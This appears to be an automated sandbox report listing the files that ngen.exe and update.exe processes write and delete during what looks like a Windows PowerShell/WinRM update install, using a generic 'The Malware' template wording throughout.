The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (826 bytes)

The process ngen.exe:3736 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1186 bytes)

The process ngen.exe:3832 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (800 bytes)

The process ngen.exe:3792 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (770 bytes)

The process ngen.exe:320 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1418 bytes)

The process ngen.exe:1504 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (730 bytes)

The process ngen.exe:3760 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (772 bytes)

The process ngen.exe:3816 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1114 bytes)

The process ngen.exe:3660 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (596 bytes)

The process ngen.exe:3748 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (494 bytes)

The process ngen.exe:3728 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (866 bytes)

The process ngen.exe:3720 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (554 bytes)

The process ngen.exe:3704 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1220 bytes)

The process ngen.exe:1848 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (486 bytes)

The process ngen.exe:3784 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1450 bytes)

The process ngen.exe:3684 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (896 bytes)

The process ngen.exe:3840 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1140 bytes)

The process ngen.exe:1532 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (784 bytes)

The process ngen.exe:3848 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (474 bytes)

The process ngen.exe:1740 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1184 bytes)

The process update.exe:1988 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%System%\SETBF.tmp (42 bytes)
%WinDir%\ocmsn.log (7791 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (16 bytes)
%System%\SET12.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (1281 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (12 bytes)
%System%\SETC.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (950 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (4 bytes)
%System%\SET2D.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (17 bytes)
%System%\SET25.tmp (1281 bytes)
%System%\SET13.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (673 bytes)
%System%\SET20.tmp (2 bytes)
%System%\SET14.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (49 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (673 bytes)
%WinDir%\inf\SET32.tmp (38 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (3 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (38 bytes)
%System%\SET2A.tmp (2 bytes)
%WinDir%\inf\oem10.PNF (9992 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (10 bytes)
%System%\SET7.tmp (35 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (601 bytes)
%WinDir%\msmqinst.log (5240 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (15 bytes)
%System%\SET22.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (673 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (10 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (7 bytes)
%System%\SET2B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (40 bytes)
%WinDir%\inf\SET18.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (3 bytes)
%System%\SETE.tmp (22 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (7 bytes)
%System%\SET6.tmp (2 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
%System%\wbem\SET4.tmp (4 bytes)
%System%\SET17.tmp (673 bytes)
%WinDir%\tabletoc.log (2313 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
%System%\SETA.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (7 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (13 bytes)
%WinDir%\MedCtrOC.log (8910 bytes)
%System%\config\SYSTEM.LOG (8361 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (3 bytes)
%System%\SET27.tmp (601 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (9 bytes)
%System%\SET11.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (24 bytes)
%System%\config (292 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (20 bytes)
%WinDir%\Help\SETC5.tmp (12287 bytes)
%System%\SET8.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (61 bytes)
%WinDir%\msgsocm.log (6541 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
%System%\SETF.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (22 bytes)
%System%\SET10.tmp (2 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (7971 bytes)
%System%\SET26.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (9 bytes)
%System%\SET21.tmp (35 bytes)
%System%\config\system (6108 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (673 bytes)
%WinDir%\SECD0.tmp (1897 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (2 bytes)
%WinDir%\imsins.log (3604 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (57 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (3 bytes)
%System%\SET16.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (3361 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (15 bytes)
%System%\CatRoot2\dberr.txt (1025 bytes)
%System%\SETB.tmp (1281 bytes)
%System%\SET1F.tmp (1 bytes)
%WinDir%\iis6.log (138978 bytes)
%WinDir%\comsetup.log (48646 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (6 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (22 bytes)
%System%\SET28.tmp (22 bytes)
%System%\SET5.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (2321 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (1 bytes)
%System%\SET31.tmp (673 bytes)
%System%\SET2E.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (10 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (601 bytes)
%System%\SET29.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (21 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (6 bytes)
%System%\SET2C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (16 bytes)
%WinDir%\KB968930.log (242973 bytes)
%System%\SET15.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (18248 bytes)
%WinDir%\ntdtcsetup.log (22997 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (438 bytes)
%WinDir%\inf\oem10.inf (673 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (12 bytes)
%System%\SET24.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (10177 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (19 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
%WinDir%\FaxSetup.log (53338 bytes)
%WinDir%\tsoc.log (79170 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (1425 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (9 bytes)
%System%\winrm\0409\SET1D.tmp (601 bytes)
%System%\SETD.tmp (601 bytes)
%WinDir%\inf\SET19.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (18 bytes)
%System%\SET9.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (12 bytes)
%System%\winrm\0409\SET37.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (40 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (27 bytes)
%WinDir%\ocgen.log (71000 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (1281 bytes)
%System%\SET2F.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (17 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (23 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (2 bytes)
%System%\SET30.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (6 bytes)
%System%\wbem\SET1E.tmp (4 bytes)
%System%\SET23.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (24 bytes)
%WinDir%\netfxocm.log (9089 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (10 bytes)
%WinDir%\inf\SET33.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (7 bytes)

The Malware deletes the following file(s):

%System%\SETBF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (0 bytes)
%System%\SET12.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (0 bytes)
%WinDir%\_000003_.tmp.dll (0 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (0 bytes)
%System%\SETC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (0 bytes)
%System%\_000002_.tmp.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (0 bytes)
%System%\wevtfwd.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (0 bytes)
%WinDir%\inf\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (0 bytes)
%System%\SET25.tmp (0 bytes)
%System%\SET13.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (0 bytes)
%System%\SET20.tmp (0 bytes)
%System%\SET14.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (0 bytes)
%WinDir%\inf\SET32.tmp (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (0 bytes)
%System%\SET7.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (0 bytes)
%System%\SET2A.tmp (0 bytes)
%WinDir%\inf\oem10.PNF (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (0 bytes)
%System%\WsmWmiPl.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (0 bytes)
%System%\GroupPolicy\Adm\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (0 bytes)
%System%\winrm\0409\winrm.ini (0 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (0 bytes)
%System%\winrscmd.dll (0 bytes)
%System%\SET2B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (0 bytes)
%System%\SET2E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (0 bytes)
%System%\wsmanhttpconfig.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (0 bytes)
%System%\winrm.cmd (0 bytes)
%System%\SETE.tmp (0 bytes)
%System%\winrm.vbs (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (0 bytes)
%System%\SET6.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (0 bytes)
%System%\wbem\SET4.tmp (0 bytes)
%System%\SET17.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (0 bytes)
%System%\SETA.tmp (0 bytes)
%System%\SET22.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (0 bytes)
%System%\SET27.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (0 bytes)
%System%\SET11.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (0 bytes)
%System%\WsmAuto.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (0 bytes)
%System%\SET8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (0 bytes)
%System%\SETF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (0 bytes)
%System%\wbem\wsmAuto.mof (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (0 bytes)
%System%\wsmplpxy.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (0 bytes)
%System%\SET26.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (0 bytes)
%System%\SET21.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (0 bytes)
%System%\SET16.tmp (0 bytes)
%System%\GroupPolicy\Adm\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (0 bytes)
%WinDir%\SECD0.tmp (0 bytes)
%System%\GroupPolicy\Adm\EventForwarding.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (0 bytes)
%System%\winrmprov.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (0 bytes)
%System%\wsmprovhost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (0 bytes)
%System%\winrmprov.mof (0 bytes)
%WinDir%\imsins.BAK (0 bytes)
%System%\SETB.tmp (0 bytes)
%System%\SET1F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (0 bytes)
%WinDir%\inf\oem10.inf (0 bytes)
%System%\SET28.tmp (0 bytes)
%System%\SET5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (0 bytes)
%System%\winrshost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (0 bytes)
%System%\SET31.tmp (0 bytes)
%WinDir%\inf\SET18.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (0 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\@.lnk (0 bytes)
%System%\WsmPty.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (0 bytes)
%System%\SET29.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (0 bytes)
%System%\WsmRes.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (0 bytes)
%WinDir%\Temp\UPD3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (0 bytes)
%System%\SET2C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (0 bytes)
%System%\SET15.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (0 bytes)
%System%\wbem\SET1E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (0 bytes)
%System%\SET2D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (0 bytes)
%System%\SET24.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (0 bytes)
%System%\winrssrv.dll (0 bytes)
%WinDir%\inf\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (0 bytes)
%System%\winrm\0409\SET1D.tmp (0 bytes)
%System%\SETD.tmp (0 bytes)
%System%\SET10.tmp (0 bytes)
